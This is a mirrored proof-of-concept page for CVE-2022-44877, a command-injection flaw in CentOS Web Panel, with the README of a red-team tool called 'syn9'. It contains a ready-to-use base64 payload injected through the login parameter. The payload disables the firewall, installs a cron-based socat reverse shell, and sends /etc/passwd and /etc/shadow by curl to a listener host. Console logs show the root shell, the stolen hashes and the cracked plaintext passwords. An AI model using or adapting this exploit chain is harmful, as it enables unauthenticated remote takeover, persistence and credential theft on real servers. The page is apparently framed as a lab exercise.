Associated Vulnerability
Title:CentOS Web Panel 操作系统命令注入漏洞 (CVE-2022-44877)Description:CentOS Web Panel(CWP)是Control Web Panel社区的一款免费的虚拟主机控制面板。 Centos Web Panel 7 v0.9.8.1147之前版本存在安全漏洞,该漏洞源于/login/index.php组件存在问题,允许未经身份验证的攻击者通过精心设计的HTTP请求执行任意系统命令。
Description
Red Team utilities for setting up CWP CentOS 7 payload & reverse shell (Red Team 9 - CW2023)
Readme
Docs Paper : https://docs.google.com/document/d/1rQ7e9i2AFzHbASfRu3nkgjIswbrS2AB2i7V9OK3dJLs/edit?usp=sharing <br>
Libprochider : https://github.com/gianlucaborello/libprocesshider > ```/var/www/html``` <br>
YouTube Demo : https://www.youtube.com/watch?v=V0HgzE8IElA&t=343s <br>
---
## tested machine box
- [x] CentOS 7 - CentOS Web Panel 9.8.1146
- [x] Kali Linux 2022.4.5 / Any Debian-based
- [x] Ubuntu 20,04 - ModSecurity network-based WAF + Reverse Proxy
- [x] Mikrotik Router - NAT Port Forwarding
<p align="center">
<img align="center" width="auto" src="doc/image/topology.png?raw=true">
</p>
## flag usage and docs
```
Usage: syn9 [OPTION]... [ARG]...
Red Team utilities for setting up CWP CentOS 7 payload & reverse shell
Available flag options, starred one are combination purposes ...
-h launch command usage for avilable flag options & examples
-g generate a payload string with predefined POST body to be used externally
-i inject the payload string via curl's POST request internally instead
-n ** specify the IP address via the issued network interface
-o ** specify the listener port address
-c ** specify the SSL certificate path with .PEM format file
-w ** specify the CWP site's IP address along with its port number
-d ** specify other network interface to be used as decoy on HTTP request
-e ** specify wordlist to be used for John to match the password hash from API
Flag usage examples:
$ bash syn9 -o 6666 -c openssl-cert/bind.pem -n eth0 ## to create a listener
$ bash syn9 -w 10.0.0.100:2031 -o 6666 -n eth0 -g ## to generate the payload string
$ bash syn9 -w 10.0.0.100:2031 -o 6666 -n eth0 -i ## to inject the payload via curl
$ bash syn9 -w 10.0.0.100:2031 -o 6666 -n eth0 -i -d eth1
$ bash syn9 -e /usr/share/wordlists/rockyou.txt ## wordlist for cracking password
```
## printing the generated payload
```
┌──(kali㉿kali)-[/media/sf_Remote/cwp-rce-white-box]
└─$ ./syn9 -w 10.0.0.100:2031 -o 6666 -n eth0 -g
[-] URI address : POST https://10.0.0.100:2031/login/index.php?login=$($payload) ...
[-] SSL connect : 172.16.1.100:6666 ...
[-] POST data : username=root&password=pwned&commit=login ...
[-] socat opts. : exec:'bash -li',pty,stderr,setsid,sigint,sane ...
---
[-] generating payload in base64 format ...
---
$(echo${IFS}IyEvYmluL2Jhc2gKJCh3aGljaCBjYXQpIC9kZXYvbnVsbCA+IC9ldGMvY3NmL2NzZi5kZW55CiQod2hpY2ggY3NmKSAteCAmIHdhaXQKJCh3aGljaCBzeXN0ZW1jdGwpIHN0b3AgY3NmLnNlcnZpY2UgJiB3YWl0CnBhdGhlbnY9JChwcmludGVudiBQQVRIKQpldmVudD0iRElTUExBWT06MApQQVRIPSIkcGF0aGVudiIKKi8xICogKiAqICogaXA9XCQoY3VybCAtcyBodHRwOi8vMTcyLjE2LjEuMTAwOjIwODAvIHwgY3V0IC1kICdcIicgLWYgNCk7IHBvcnQ9XCQoY3VybCAtcyBodHRwOi8vMTcyLjE2LjEuMTAwOjIwODAvIHwgY3V0IC1kICdcIicgLWYgMTIpOyAkKHdoaWNoIHNvY2F0KSBleGVjOidiYXNoIC1saScscHR5LHN0ZGVycixzZXRzaWQsc2lnaW50LHNhbmUgT1BFTlNTTDpcJGlwOlwkcG9ydCx2ZXJpZnk9MCIKY3JvbnRhYiAtdSByb290IC1sIHwgZ3JlcCAvdXNyL2xvY2FsL2N3cC9waHA3MS9iaW4vcGhwIHwgY3JvbnRhYiAtdSByb290IC0KKGNyb250YWIgLWw7IHByaW50ZiAiJGV2ZW50XG4iKSB8IGNyb250YWIgLQpwYXNzd2Q9JChjYXQgL2V0Yy9wYXNzd2QgfCBncmVwIC1FICdob21lfHJvb3QnIHwgYmFzZTY0IHwgdHIgLWQgJ1xuJykKYXJyX3B3ZD0kKGNhdCAvZXRjL3Bhc3N3ZCB8IGdyZXAgLUUgJ2hvbWV8cm9vdCcgfCBjdXQgLWQgJzonIC1mIDEpCnNoYWRvdz0kKGNhdCAvZXRjL3NoYWRvdyB8IGdyZXAgIiRhcnJfcHdkIiB8IGJhc2U2NCB8IHRyIC1kICdcbicpCmN1cmwgLXMgLXEgLS1kYXRhIHtcIkRBVEFcIjp7XCJQQVNTV0RcIjpcIiRwYXNzd2RcIn19IC1YIFBBVENIIGh0dHA6Ly8xNzIuMTYuMS4xMDA6MjA4MC8gLW8gL2Rldi9udWxsCmN1cmwgLXMgLXEgLS1kYXRhIHtcIkRBVEFcIjp7XCJTSEFET1dcIjpcIiRzaGFkb3dcIn19IC1YIFBBVENIIGh0dHA6Ly8xNzIuMTYuMS4xMDA6MjA4MC8gLW8gL2Rldi9udWxsCiQod2hpY2ggc29jYXQpIGV4ZWM6J2Jhc2ggLWxpJyxwdHksc3RkZXJyLHNldHNpZCxzaWdpbnQsc2FuZSBPUEVOU1NMOjE3Mi4xNi4xLjEwMDo2NjY2LHZlcmlmeT0wCg==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)
```
## injecting it. straight up
```
┌──(kali㉿kali)-[/media/sf_Remote/cwp-rce-white-box]
└─$ ./syn9 -w 192.168.1.14:2031 -o 6666 -n eth0 -i
[-] URI address : POST https://192.168.1.14:2031/login/index.php?login=$($payload) ...
[-] SSL connect : 192.168.1.15:6666 ...
[-] POST data : username=root&password=pwned&commit=login ...
[-] socat opts. : exec:'bash -li',pty,stderr,setsid,sigint,sane ...
---
[-] injecting payload to the URI via curl ...
[-] halting tty for the remote access session (9821)...
--
```
## listener on enc. reverse shell
```
┌──(kali㉿kali)-[/media/sf_Remote/cwp-rce-white-box]
└─$ ./syn9 -o 6666 -c openssl-cert/bind.pem -n eth0
[-] SSL listen : 192.168.1.15:6666 ...
[-] SSL cert : openssl-cert/bind.pem,verify=0 ...
[-] socat opts. : file:`tty`,raw,echo=0 ...
---
[-] suggesting static terminal size, rows [20/42] x cols [92/184] ...
[-] $ stty rows X cols X
[-] $ export TERM=xterm-256color
---
********************************************
Welcome to CWP (CentOS WebPanel) server
********************************************
CWP Wiki: http://wiki.centos-webpanel.com
CWP Forum: http://forum.centos-webpanel.com
CWP Support: http://centos-webpanel.com/support-services
13:11:38 up 10 min, 1 user, load average: 0.01, 0.13, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
server pts/0 192.168.1.7 13:06 5:36 0.09s 0.09s -bash
[root@centos login]#
```
## REST API on storing passwd & shadow
```
[
{
"IP_LISTENER": "172.16.1.100",
"IP_TARGET": "10.0.0.100:2031",
"PORT_LISTENER": "26666",
"LAST_UPDATE": "2023-03-07 23:31:57.497925211 -0500 EST m=+839.545072256",
"DATA": {
"PASSWD": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApvcGVyYXRvcjp4OjExOjA6b3BlcmF0b3I6L3Jvb3Q6L3NiaW4vbm9sb2dpbgpzZXJ2ZXI6eDoxMDAwOjEwMDA6bXVoYW1tYWQgbnVyIGlyc3lhZDovaG9tZS9zZXJ2ZXI6L2Jpbi9iYXNoCmxvZ2luOng6OTkwOjk4ODo6L2hvbWUvbG9naW46L3NiaW4vbm9sb2dpbgo=",
"SHADOW": "cm9vdDokNiRMWE0wcUZHdSQ0azBoZEg5UUREQjJTNE51dFJTNFVGMU5lOE81eE5ROXdia2czZzFZS3ZYWW8ua2NnVDdPVjFrNTJNVnZudTJ0ZHVVbjVoSzYxVTVLRUVRTzJ3cFd4LzoxOTQwNDowOjk5OTk5Ojc6OjoKb3BlcmF0b3I6KjoxODM1MzowOjk5OTk5Ojc6OjoKc2VydmVyOiQ2JDl6ekZOR2lJSFZna0VIb3MkV2J3cThmVUhHRExPUEUvYmFKbERnQWlzR2k0OGhzRGJwSWs0TTJoZVVMalFWcUdOZjFsU3lZRHNYWlF4NTJnODk4MVk5M3JMMXRET2duSE5LNkdtMS86OjA6OTk5OTk6Nzo6Ogpsb2dpbjohIToxOTQwNDo6Ojo6Ogo="
}
}
]
```
## extract them juices with John The Ripper
```
┌──(root㉿kali)-[/media/sf_cwp-rce-white-box]
└─# ./syn9 -e /usr/share/wordlists/rockyou.txt
---
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Node numbers 1-4 of 4 (fork)
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
okok1ABC (root)
1 0g 0:00:00:00 DONE (2023-03-07 23:34) 0g/s 25.49p/s 50.98c/s 50.98C/s 123456..superman
Waiting for 3 children to terminate
3 0g 0:00:00:00 DONE (2023-03-07 23:34) 0g/s 48.14p/s 96.29c/s 96.29C/s 123456789..okok
okok1ABC (server)
4 2g 0:00:00:00 DONE (2023-03-07 23:34) 7.692g/s 50.00p/s 100.0c/s 100.0C/s password..okok1ABC
2 0g 0:00:00:00 DONE (2023-03-07 23:34) 0g/s 28.88p/s 57.77c/s 57.77C/s 12345..hannah
Session completed.
┌──(root㉿kali)-[/media/sf_cwp-rce-white-box]
└─# cat log/03-07-23.log
23:34:54 PM -- 10.0.0.100:2031
root:okok1ABC:0:0:root:/root:/bin/bash
server:okok1ABC:1000:1000:muhammad nur irsyad:/home/server:/bin/bash
```
## ModSecurity sample 404 page
<p align="center">
<img align="center" width="auto" src="doc/image/waf-sample.png?raw=true">
</p>
File Snapshot
[4.0K] /data/pocs/8768b41c33c5c7ebddebc9fae38b4122821f5826
├── [4.0K] doc
│ ├── [ 694] audit.rules
│ ├── [1.2K] bypass_waf.rules
│ ├── [4.0K] capture
│ │ ├── [149K] error_log
│ │ ├── [ 12K] modsec_audit.log.cap
│ │ ├── [2.7K] nikto.cap
│ │ ├── [ 384] nmap-10-ps.cap
│ │ ├── [ 327] nmap-128-ps.cap
│ │ ├── [ 421] nmap-172-ps.cap
│ │ ├── [ 597] nmap-192-ps.cap
│ │ ├── [ 64K] nmap.cap
│ │ ├── [6.9M] post-2-fw.nping.cap
│ │ └── [1.7M] post-fw.nping.cap
│ ├── [4.0K] image
│ │ ├── [ 16K] attack-tree.drawio
│ │ ├── [ 51K] attack-tree.png
│ │ ├── [191K] cvss.png
│ │ ├── [4.0K] snapshot
│ │ │ ├── [ 35K] cracked-pw-2.png
│ │ │ ├── [ 49K] cracked-pw-3.png
│ │ │ ├── [ 48K] cracked-pw.png
│ │ │ ├── [ 56K] established-shell-2.png
│ │ │ ├── [ 40K] established-shell-cron.png
│ │ │ ├── [ 51K] established-shell.png
│ │ │ ├── [ 82K] generate-payload.png
│ │ │ ├── [ 36K] inject-payload-2.png
│ │ │ ├── [ 32K] inject-payload.png
│ │ │ ├── [ 31K] open-listener.png
│ │ │ ├── [ 35K] ping-kali-cwp.png
│ │ │ ├── [ 21K] post-hider-2.png
│ │ │ ├── [ 21K] post-hider-3.png
│ │ │ ├── [ 22K] post-hider-4.png
│ │ │ ├── [ 30K] post-hider.png
│ │ │ ├── [ 32K] pre-hider-2.png
│ │ │ ├── [ 32K] pre-hider-3.png
│ │ │ ├── [ 36K] pre-hider-4.png
│ │ │ ├── [ 41K] pre-hider.png
│ │ │ ├── [ 48K] rest-api.png
│ │ │ └── [127K] vbox.png
│ │ ├── [ 96K] topology-2.png
│ │ ├── [8.3K] topology.drawio
│ │ ├── [ 92K] topology.png
│ │ └── [ 90K] waf-sample.png
│ ├── [ 14K] setup.txt
│ ├── [1.4K] sus_cnc.rules
│ └── [3.0K] unauthz.rules
├── [ 11K] LICENSE
├── [4.0K] log
│ ├── [ 420] 03-02-23.log
│ ├── [ 280] 03-07-23.log
│ ├── [ 0] 03-21-23.log
│ ├── [ 139] 03-22-23.log
│ ├── [ 139] 03-25-23.log
│ ├── [ 139] 03-29-23.log
│ ├── [ 141] 04-09-23.log
│ ├── [ 282] 04-12-23.log
│ ├── [ 141] 04-13-23.log
│ └── [ 141] 04-15-23.log
├── [4.0K] openssl-cert
│ ├── [1.2K] bind.crt
│ ├── [1.7K] bind.key
│ └── [2.9K] bind.pem
├── [7.2K] README.md
├── [4.0K] script
│ ├── [ 75] go.mod
│ ├── [ 163] go.sum
│ ├── [7.0M] main
│ ├── [2.3K] main.go
│ ├── [1.8K] payload.base.sh
│ ├── [ 224] runbg.main.sh
│ ├── [ 87] target.lst
│ └── [1.5K] toggle-modsec.sh
└── [ 11K] syn9
7 directories, 67 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.